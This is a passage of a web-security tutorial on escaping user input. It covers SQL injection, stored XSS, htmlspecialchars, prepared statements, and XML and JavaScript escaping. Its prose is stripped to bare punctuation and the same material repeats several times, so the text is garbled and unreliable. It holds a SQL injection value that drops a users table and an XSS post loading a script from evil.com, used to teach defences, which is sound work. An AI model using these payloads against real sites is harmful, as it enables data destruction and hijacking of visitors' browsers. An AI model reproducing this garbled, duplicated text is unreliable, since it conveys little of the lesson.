, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML). ? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " & ", .. : " &< "
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name'] - , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string , - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars , , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).